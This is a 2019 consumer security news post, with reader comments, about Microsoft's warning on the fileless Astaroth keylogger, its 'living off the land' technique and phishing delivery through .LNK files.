You are here

HomeJohn Lister › New Super Stealth Astaroth Malware Records Keystrokes

New Super Stealth Astaroth Malware Records Keystrokes

John Lister's picture
by John Lister on July, 11 2019 at 09:07AM EDT

Microsoft has warned users about a complicated but cunning malware attack that might not be caught by all security tools. The "Astaroth" malware doesn't actually exist as a file in its own right.

The main risk to users from Astaroth is that it includes a keylogger. This means it can access everything victims type, including passwords and other sensitive data. That's one of the reasons sites such as online banks often ask users to type specific characters (such as third and eighth) rather than an entire password.

Malware Hides Within Windows

What makes Astaroth so hard to detect is that it uses a technique dubbed "living off the land." It's a sophisticated and complicated approach, but in simple terms the malware doesn't have any executable files. Instead, it runs within legitimate Windows processes. (Source: medium.com)

That's a big problem for many security tools that work by scanning computers and monitoring downloads to look for files that are either known to be malicious or show suspicious characteristics. Such tools don't usually interfere with Windows processes as this could affect the smooth running of a computer and deter people from using the security tools.

The good news is that other anti-malware techniques can spot Astaroth, including Microsoft Defender ATP. That was previously a commercial product aimed at businesses but is now built into Windows 10 by default.

Dubious Links Distribute Danger

These techniques involve monitoring activity on the computer for signs of something amiss. A Microsoft spokesman said that "Some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would." (Source: theinquirer.net)

The way the malware gets onto computers in the first place is nothing new: it's spread by bogus emails that encourage users to click on a link to a file. In this case the file is in .LNK format, which is normally used for shortcuts to Windows applications, such as those that appear on a desktop. Once the .lnk file is clicked, it downloads the malware.

What's Your Opinion?

Do you understand how your chosen security tools work? Is it worth the extra demand on resources to have security software that runs continuously rather than just scanning files when necessary? Should email providers and browsers have an option to warn users to think carefully before opening any attachment or following a link in an email?

Filed under:
Security
| Tags:
astaroth
,
windows defender
,
windows 10
,
malware
,
keylogger
,
stealth
Rate this article: 
Average: 5 (11 votes)

Comments

brigadand's picture

Submitted by brigadand on Thu, 07/11/2019 - 17:31

Other than Microsoft Defender ATP are there any other anti-malware programs that protect your system from this?

buzzallnight's picture

Submitted by buzzallnight on Thu, 07/11/2019 - 20:40

"living off the land." mean that this virus takes advantage of programs that m$ put on your computer that you probably never use,

how do we shut them off??????????????????

Dennis Faas's picture

Submitted by Dennis Faas on Fri, 07/12/2019 - 12:09

I've looked into this more in depth, and an example of a "living off the land" exploit might involve downloading a script stored on a website (externally), then using a localized program such as powershell to execute said script.

This type of attack is nothing magical except that there is physically no malware-laiden executables (EXEs) running except for the powershell itself, which takes is arguments from the malicious script. Hence this is by definition "living off the land" because it is now considered "stealth" with no EXEs.

We can assume execution of that script via powershell is done using administrative privileges. The only way for this to happen would likely involve the system already being infected with some sort of malware executable, or the user being tricked into social engineering, though this would be difficult at best to pull off.

As for protection, make backups and scan your system for malware regularly, patch the system, etc. Read this article on how to stay protected.

Need Help? Ask!



My name is Dennis Faas and I am a senior systems administrator and IT technical analyst specializing in cyber crimes (sextortion / blackmail / tech support scams) with over 30 years experience; I also run this website! If you need technical assistance , I can help. Click here to email me now; optionally, you can review my resume here. You can also read how I can fix your computer over the Internet (also includes user reviews).

We are BBB Accredited

We are BBB accredited (A+ rating), celebrating 21 years of excellence! Click to view our rating on the BBB.